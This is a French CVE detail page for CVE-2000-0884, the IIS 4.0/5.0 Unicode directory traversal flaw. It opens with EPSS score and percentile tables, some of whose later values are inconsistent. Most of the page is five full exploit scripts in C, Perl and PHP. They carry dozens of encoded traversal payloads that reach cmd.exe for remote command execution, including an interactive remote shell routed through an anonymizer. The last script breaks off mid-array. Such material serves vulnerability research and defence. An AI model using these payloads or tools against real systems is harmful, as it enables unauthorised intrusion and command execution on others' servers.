CVE-2000-0884 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	26.56%	–	–
2022-04-03	–	–	26.56%	–	–
2023-03-12	–	–	–	95.48%	–
2023-07-02	–	–	–	93.56%	–
2024-02-11	–	–	–	93.79%	–
2024-06-02	–	–	–	93.79%	–
2025-01-19	–	–	–	93.79%	–
2025-03-18	–	–	–	–	90.06%
2025-03-18	–	–	–	–	90.06,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	96%
2022-04-03	97%
2023-03-12	99%
2023-07-02	99%
2024-02-11	99%
2024-06-02	99%
2025-01-19	99%
2025-03-18	1%
2025-03-18	1%

// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. #include <stdio.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/wait.h> #include <unistd.h> #include <fcntl.h> #define SEND 100000 #define RECIVE 1000000 char *str_replace(char *rep, char *orig, char *string) { int len=strlen(orig); char buf[SEND]=""; char *pt=strstr(string,orig); strncpy(buf,string, pt-string ); strcat(buf,rep); strcat(buf,pt+strlen(orig)); strcpy(string,buf); return string; } /***************************************************************************/ int main(int argc,char *argv[]) { int sockfd, numbytes; char recv_buf[RECIVE]; int i; int port; char *uni[]={ "..%c0%af..", "..%c0%af../..%c0%af../..%c0%af..", "..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..", "..%c1%1c..", "..%c1%1c../..%c1%1c../..%c1%1c..", "..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..", "..%252f..", "..%252f../..%252f../..%252f..", "..%252f..%252f..%252f..%252f..%252f..", "..%252e..", ".%252e..", "..%252e../..%252e../..%252e..", "..%252e..%252e..%252e..%252e..%252e..", "..%c0%9v..", "..%c0%9v../..%c0%9v../..%c0%9v..", "..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..", "..%c0%qf..", "..%c0%qf../..%c0%qf../..%c0%qf..", "..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..", "..%c1%8s..", "..%c1%8s../..%c1%8s../..%c1%8s..", "..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..", "..%c1%9c..", "..%c1%9c../..%c1%9c../..%c1%9c..", "..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..", "..%c1%pc..", "..%c1%pc../..%c1%pc../..%c1%pc..", "..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..", "..%255c..", "..%255c../..%255c../..%255c..", "..%255c..%255c..%255c..%255c..%255c..", "..%5c..", "..%5c../..%5c../..%5c..", "..%5c..%5c..%5c..%5c..%5c..", "..%%35c..", "..%%35c../..%%35c../..%%35c..", "..%%35c../..%%35c../..%%35c", //last news "..%%35c..%%35c..%%35c..%%35c..%%35c..", "..%%35%63..", "..%%35%63../..%%35%63../..%%35%63..", "..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..", "..%25%35%63..", "..%25%35%63../..%25%35%63../..%25%35%63..", "..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63.." }; char *path[]={ "/scripts/#uni/winnt/system32/cmd.exe?/c+", "/scripts/#uniwinnt/system32/cmd.exe?/c+", "/msadc/#uni/winnt/system32/cmd.exe?/c+", "/cgi-bin/#uni/winnt/system32/cmd.exe?/c+", "/samples/#uni/winnt/system32/cmd.exe?/c+", "/iisadmpwd/#uni/winnt/system32/cmd.exe?/c+", "/_vti_cnf/#uni/winnt/system32/cmd.exe?/c+", "/_vti_bin/#uni/winnt/system32/cmd.exe?/c+", "/exchange/#uni/winnt/system32/cmd.exe?/c+", "/pbserver/#uni/winnt/system32/cmd.exe?/c+", "/adsamples/#uni/winnt/system32/cmd.exe?/c+" }; int cont=0; char send_buf[SEND]=""; int x,j; int uni_len=sizeof(uni)/sizeof(char *); int path_len=sizeof(path)/sizeof(char *); struct hostent *he; struct sockaddr_in their_addr; if(argc!=4) { fprintf(stderr,"usage:%s <hostname> <port> <commands>\n",argv[0]); exit(1); } if((he=gethostbyname(argv[1]))==NULL) { perror("gethostbyname"); exit(1); } port=atoi(argv[2]); /***************************************************************************/ for(x=0;x<path_len;x++) for(j=0;j<uni_len;j++) { sprintf(send_buf,"GET %s%s HTTP/ 1.0\n\n", path[i],argv[3] ); str_replace(uni[j],"#uni",send_buf); if(cont==200) { sleep(3); cont=0; } cont++; sleep(1); if( fork()!=0) { if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family=AF_INET; their_addr.sin_port=htons(port); their_addr.sin_addr=*((struct in_addr*)he->h_addr); bzero(&(their_addr.sin_zero),8); if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1) { perror("connect"); exit(1); } if(send(sockfd,send_buf,SEND,0) ==-1) { perror("send"); exit(0); } if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1) { perror("recv"); exit(1); } recv_buf[numbytes]='\0'; //printf("%s\n",recv_buf); if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1) { perror("recv"); exit(1); } recv_buf[numbytes]='\0'; printf("\n-----------------------------------------------\n"); printf("String: %s\n\n",send_buf); printf("%s\n------------bytes recived: %d------------------\n",recv_buf,numbytes); close(sockfd); exit(0); } close(sockfd); while(waitpid(-1,NULL, WNOHANG) > 0); } printf("Done...\n"); return 0; }

source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. #!/usr/bin/perl # Very simple PERL script to test a machine for Unicode vulnerability. # Use port number with SSLproxy for testing SSL sites # Usage: unicodecheck IP:port # Only makes use of "Socket" library # Roelof Temmingh 2000/10/21 # roelof@sensepost.com http://www.sensepost.com use Socket; # --------------init if ($#ARGV<0) {die "Usage: unicodecheck IP:port\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Testing $host:$port : "; $target = inet_aton($host); $flag=0; # ---------------test method 1 my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------test method 2 my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} # ---------------result if ($flag==1){print "Vulnerable\n";} else {print "Safe\n";} # ------------- Sendraw - thanx RFP rfp@wiretrip.net sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } # Spidermark: sensepostdata

// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. /* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */ /* coded by zipo */ /* to compile: cc -o iisuni iisuni.c */ /* made for all the lame populus :) */ #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <signal.h> #include <netinet/in.h> #include <netdb.h> #define BUFF_LEN 6000 #define HTTP " HTTP/1.0\r\n\r\n" #define GET "GET http://" /* this is the anonymous server used */ #define ANON "anon.free.anonymizer.com" /* this are all the types of bugs */ #define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+" #define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG4_STR "/" /* this is the IIS http server port */ #define HTTP_PORT 80 int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN]; int sck, i; if (argc < 3) bad_params (argv[0]); switch (atoi(argv[2])) { case 1: bug = BUG1_STR; break; case 2: bug = BUG2_STR; break; case 3: bug = BUG3_STR; break; case 4: bug = BUG4_STR; break; default: printf ("Number error\n"); exit(1); } while (1) { printf ("bash# "); fgets (cmd, sizeof(cmd), stdin); cmd[strlen(cmd)-1] = '\0'; if (strcmp(cmd, "exit")) { if (!strcmp(cmd, "clear")) { system("clear"); continue; } else if (!strcmp(cmd, "")) { continue; } else if (!strcmp(cmd, "?")) { printf ("Just you need to type in the prompt the M$DOS command\n"); printf ("to exit type \"exit\" :)\n"); continue; } /* prepare the string to be sent */ for (i=0;i<=strlen(cmd);i++) { if (cmd[i] == 0x20) cmd[i] = 0x2b; } sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP); /* get ip */ if ((he = gethostbyname (ANON)) == NULL) { herror ("host error"); exit (1); } /* setup port and other parameters */ sin.sin_port = htons (HTTP_PORT); sin.sin_family = AF_INET; memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length); /* create a socket */ if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) { perror ("socket() error"); exit (1); } /* connect to the sucker */ if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) { perror ("connect() error"); exit (1); } /* send the beautifull string */ write (sck, buffer, sizeof(buffer)); /* recive all ! :) */ read (sck, recbuffer, sizeof(recbuffer)); /* and print it */ recbuffer[strlen(recbuffer)-1]='\0'; printf ("\033[0;7m-------------------------------------Received-------------------- ---------------\n"); printf ("%s\n---------------------------------------Done--------------------------- ----------\n\033[7;0m", recbuffer); /* close the socket ... not needed any more */ close (sck); /* put zero's in the buffers */ bzero (buffer, sizeof(buffer)); bzero (recbuffer, sizeof(recbuffer)); } else { /* you type "exit" cya :) */ exit(0); } } } /* you miss a parameter :'-( */ int bad_params (char *prog_name) { fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name); fprintf (stdout, "-------------------------------------------------------\n"); fprintf (stdout, "<1> msadc\t"); fprintf (stdout, "<2> scripts\t"); fprintf (stdout, "<3> iisadmpwd\t"); fprintf (stdout, "<4> /\n"); fprintf (stdout, "-------------------------------------------------------\n"); exit (1); } /* EOF */

source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. #!php -q <? $vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+"; $vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+"; $vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+"; $vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+"; $vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+"; $vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+"; $vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+"; $vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"; $vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+"; $vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+"; $vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+"; $vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+"; $vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+"; $vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+"; $vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+"; $vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+"; $vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[63]="/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+"; $vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; $vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+"; if(!isset($argv[1])) { echo "\n\n--------------------------------------------------------------------\n"; echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron ------\n"; echo "--------------------------------------------------------------------\n\n"; echo "Usage of the wicked device:\n"; echo $argv[0]." -t www.victim.vic\n"; echo $argv[0]." -t www.victim.vic -p proxy:port\n"; echo $argv[0]." www.victim.vic comand variant_number\n"; echo $argv[0]." -p proxy:port www.victim.vic comand variant_number\n"; echo "Options:\n"; echo "-t --> Test the vulnerability (Try known variants till find the good one)\n"; echo "-p --> Attack through proxy\n"; echo "\nUse Mode:\n1) Test the host and get the variants number in case vulnerability exists\n"; echo "2) Attack with command and variants number (optionaly you can use proxy)\n"; echo "Note : When you specify a command with spaces, replace spaces with low script \"_\" \n"; echo "and you must double the backslash \"\\\". \n Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n"; echo "Thanks to An-tonio for the proxy support.\n"; echo "Bug discover by Anonymous Post.\n"; echo "TYPE ".$argv[0]." spanish, for Spanish help.\n"; } else { if($argv[1]=="spanish") { echo "\n\n--------------------------------------------------------------------\n"; echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por BoloTron ----\n"; echo "--------------------------------------------------------------------\n\n"; echo "Uso del artefacto maligno :\n"; echo $argv[0]." -t www.victima.vic\n"; echo $argv[0]." -t www.victima.vic -p proxy:puerto\n"; echo $argv[0]." www.victima.vic comando n�_de_variante\n"; echo $argv[0]." -p proxy:port www.victima.vic comand n�_de_variante\n"; echo "Opciones:\n"; echo "-t --> Testea la vulnerabilidad, prueba todas las variantes hasta encontrar una buena.\n"; echo "-p --> Ataque a traves de proxy\n"; echo "\nModo de Empleo:\n1) Testear el host y anotar el numero de variante en caso de ser vulnerable\n"; echo "2) Atacar especificando comando y n� de variante (opcionalmente puedes especificar un proxy)\n"; echo "Nota : Cuando se especifica un comando en el que hay espacios hay que sustituirlos por un guion bajo _ \n"; echo "y las contrabarras hay que ponerlas dobles. \nEjemplo : ".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n"; echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n"; echo "Bug descubierto por aviso anonimo.\n"; exit; } if($argv[1]=="-t") { if ($argv[3]=="-p") { for($i=0;$i<70;$i++) { $prox=explode(":",$argv[4]); $comando="dir+c:\\"; $fp = fsockopen($prox[0], $prox[1]); if(!$fp) { echo "Conection failed...\n"; } else { fputs($fp,"GET http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n"); echo "Trying variant number ".$i." "; while(!feof($fp)) { $resul=$resul.fgets($fp,128); } if (ereg("<DIR>", $resul)) { echo "-----> Vulnerable!!\n"; exit; } else { echo "-----> NoT Vulnerable :(\n"; } } fclose($fp); } } else { for($i=0;$i<70;$i++) { $port=80; $comando="dir+c:\\"; $fp = fsockopen($argv[2], $port); if(!$fp) { echo "Conection failed...\n"; } else { fputs($fp,"GET ".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n"); echo "Trying variant number ".$i." "; while(!feof($fp)) { $resul=$resul.fgets($fp,128); } if (ereg("<DIR>", $resul)) { echo "-----> vulnerable!!\n"; exit; } else { echo "-----> No Vulnerable :(\n"; } } fclose($fp); } } } else { if($argv[1]=="-p") { $prox=explode(":",$argv[2]); $port=$prox[1]; $comando=ereg_replace("_","+",$argv[4]); $fp = fsockopen($prox[0], $port); if(!$fp) { echo "Conection failed.\n"; } else { fputs($fp,"GET http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0\n\n"); while(!feof($fp)) { echo fgets($fp,128); } } fclose($fp); } else { $port=80; $comando=ereg_replace("_","+",$argv[2]); $fp = fsockopen($argv[1], $port); if(!$fp) { echo "Conection failed.\n"; } else { fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0\n\n"); while(!feof($fp)) { echo fgets($fp,128); } } fclose($fp); } } } ?>

source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever. It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001) This is the vulnerability exploited by the Code Blue Worm. **UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability. ########################################################## # Spawn Ms-Doz-like Shell on MicrosoZ IIS # on IIS vulnerable servers using 450 ways # (like Unicode, Codered, corrupt string and Backdoor) # NOW SUPPORT ALL UNIX SYSTEM ! # Use port number with SSLproxy for testing SSL sites # Andrea Spabam 2001 GPL2 or highter # spabam@go.to # This Script is currently under development # link to http://spabam.da.ru to get latest version ########################################################## use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U[1] = "/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[2] = "/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[3] = "/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[4] = "/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[5] = "..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[6] = "/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[7] = "/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[8] = "/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[9] = "/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[10] = "/..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[11] = "/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+"; $U[12] = "/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+"; $U[13] = "/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+"; $U[14] = "/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+"; $U[15] = "/..%c1%1c..%c1%1c..%c1%1c..%Cc1%1cwinnt/system32/cmd.exe?/c+"; $U[16] = "/..%c1%9c..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+"; $U[17] = "/..%c0%9v../winnt/system32/cmd.exe?/c+"; $U[18] = "/..%c0%af../winnt/system32/cmd.exe?/c+"; $U[19] = "/..%c0%qf../winnt/system32/cmd.exe?/c+"; $U[20] = "/..%c1%1c../winnt/system32/cmd.exe?/c+"; $U[21] = "/..%c1%8s../winnt/system32/cmd.exe?/c+"; $U[22] = "/..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[23] = "/..%c1%af../winnt/system32/cmd.exe?/c+"; $U[24] = "/..%c1%pc../winnt/system32/cmd.exe?/c+"; $U[25] = "/..%e0%80%af../winnt/system32/cmd.exe?/c+"; $U[26] = "/..%f0%80%80%af../winnt/system32/cmd.exe?/c+"; $U[27] = "/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[28] = "/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+"; $U[29] = "/root.exe?/c+"; $U[30] = "/cmd.exe?/c+"; $U[31] = "/sensepost.exe?/c+"; $U[32] = "/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+"; $U[33] = "/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+"; $U[34] = "/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[35] = "/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[36] = "/MSADC/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+"; $U[37] = "/MSADC/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+"; $U[38] = "/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+"; $U[39] = "/MSADC/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+"; $U[40] = "/MSADC..%c1%9c../winnt/system32/cmd.exe?/c+"; $U[41] = "/MSADC/.%252e/.%252e/winnt/system32/cmd.exe?/c+"; $U[42] = "/MSADC/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+"; $U[43] = "/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+"; $U[44] = "/MSADC/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+"; $U[45] = 